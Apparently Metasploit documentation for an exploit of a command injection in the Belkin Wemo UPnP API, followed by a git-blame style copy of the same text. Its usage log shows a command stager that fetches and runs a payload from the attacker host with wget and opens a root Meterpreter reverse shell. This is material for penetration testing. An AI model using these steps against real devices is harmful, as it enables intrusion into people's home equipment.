documentation/modules/exploit/linux/upnp/belkin_wemo_upnp_exec.md

## Introduction

This module exploits a command injection in the Belkin Wemo UPnP API via
the `SmartDevURL` argument to the `SetSmartDevInfo` action.

This module has been tested on a Wemo-enabled Crock-Pot, but other Wemo
devices are known to be affected, albeit on a different `RPORT` (49153).

## Setup

You may buy the device on Amazon at <https://www.amazon.com/dp/B00IPEO02C/>.

## Targets

```
Id  Name
--  ----
0   Unix In-Memory
1   Linux Dropper
```

## Options

**RPORT**

Set this to the Wemo device's UPnP port. In our testing, this was 49152
for Crock-Pot and 49153 for other devices.

## Usage

```
msf5 exploit(linux/upnp/belkin_wemo_upnp_exec) > run

[*] Started reverse TCP handler on 10.22.22.4:4444
[+] Wemo-enabled device detected
[*] Found firmware version: 2.00.6461
[+] Firmware version 2.00.6461 < 2.00.8643
[*] 10.22.22.1:49152 - The target appears to be vulnerable.
[*] Using URL: http://0.0.0.0:8080/CKgRyLqQZtBY6
[*] Local IP: http://[redacted]:8080/CKgRyLqQZtBY6
[*] Generated command stager: ["wget -qO /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P http://10.22.22.4:8080/CKgRyLqQZtBY6", "chmod +x /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P", "/tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P", "rm -f /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P"]
[*] Regenerated command stager: cp /bin/sh /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P;wget -qO /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P http://10.22.22.4:8080/CKgRyLqQZtBY6;/tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P;rm -f /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P
[*] Client 10.22.22.1 (Wget) requested /CKgRyLqQZtBY6
[*] Sending payload to 10.22.22.1 (Wget)
[*] Transmitting intermediate stager...(164 bytes)
[*] Sending stage (1252312 bytes) to 10.22.22.1
[*] Meterpreter session 1 opened (10.22.22.4:4444 -> 10.22.22.1:4607) at 2019-02-12 14:37:37 -0600
[*] Server stopped.

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : 10.22.22.1
OS           :  (Linux 2.6.21)
Architecture : mips
BuildTuple   : mipsel-linux-muslsf
Meterpreter  : mipsle/linux
meterpreter >
```
Don't be lazy and spell out "introduction" in docs 2019-09-30 16:58:00 -05:00			`## Introduction`
Add module doc 2019-02-14 12:55:20 -06:00
			`This module exploits a command injection in the Belkin Wemo UPnP API via`
			the `SmartDevURL` argument to the `SetSmartDevInfo` action.

			`This module has been tested on a Wemo-enabled Crock-Pot, but other Wemo`
			devices are known to be affected, albeit on a different `RPORT` (49153).

			`## Setup`

			`You may buy the device on Amazon at <https://www.amazon.com/dp/B00IPEO02C/>.`

			`## Targets`

			```
			`Id Name`
			`-- ----`
Genericize exploit (less Crock-Pot verbiage) 2019-02-19 12:13:08 -06:00			`0 Unix In-Memory`
			`1 Linux Dropper`
Add module doc 2019-02-14 12:55:20 -06:00			```

			`## Options`

			`RPORT`

			`Set this to the Wemo device's UPnP port. In our testing, this was 49152`
			`for Crock-Pot and 49153 for other devices.`

			`## Usage`

			```
			`msf5 exploit(linux/upnp/belkin_wemo_upnp_exec) > run`

			`[*] Started reverse TCP handler on 10.22.22.4:4444`
Revert vprint_status to vprint_good 2019-03-04 18:22:12 -06:00			`[+] Wemo-enabled device detected`
Update module doc 2019-03-04 18:08:07 -06:00			`[*] Found firmware version: 2.00.6461`
Improve positive/negative prints in check method 2019-03-04 19:08:47 -06:00			`[+] Firmware version 2.00.6461 < 2.00.8643`
Update module doc 2019-03-04 18:08:07 -06:00			`[*] 10.22.22.1:49152 - The target appears to be vulnerable.`
Add module doc 2019-02-14 12:55:20 -06:00			`[*] Using URL: http://0.0.0.0:8080/CKgRyLqQZtBY6`
			`[*] Local IP: http://[redacted]:8080/CKgRyLqQZtBY6`
			`[*] Generated command stager: ["wget -qO /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P http://10.22.22.4:8080/CKgRyLqQZtBY6", "chmod +x /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P", "/tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P", "rm -f /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P"]`
			`[*] Regenerated command stager: cp /bin/sh /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P;wget -qO /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P http://10.22.22.4:8080/CKgRyLqQZtBY6;/tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P;rm -f /tmp/aOLC8QmRUAMLeQXrxSLP2KuMYqEvD2P`
			`[*] Client 10.22.22.1 (Wget) requested /CKgRyLqQZtBY6`
			`[*] Sending payload to 10.22.22.1 (Wget)`
			`[*] Transmitting intermediate stager...(164 bytes)`
			`[*] Sending stage (1252312 bytes) to 10.22.22.1`
			`[*] Meterpreter session 1 opened (10.22.22.4:4444 -> 10.22.22.1:4607) at 2019-02-12 14:37:37 -0600`
			`[*] Server stopped.`

			`meterpreter > getuid`
			`Server username: uid=0, gid=0, euid=0, egid=0`
			`meterpreter > sysinfo`
			`Computer : 10.22.22.1`
			`OS : (Linux 2.6.21)`
			`Architecture : mips`
			`BuildTuple : mipsel-linux-muslsf`
			`Meterpreter : mipsle/linux`
			`meterpreter >`
			```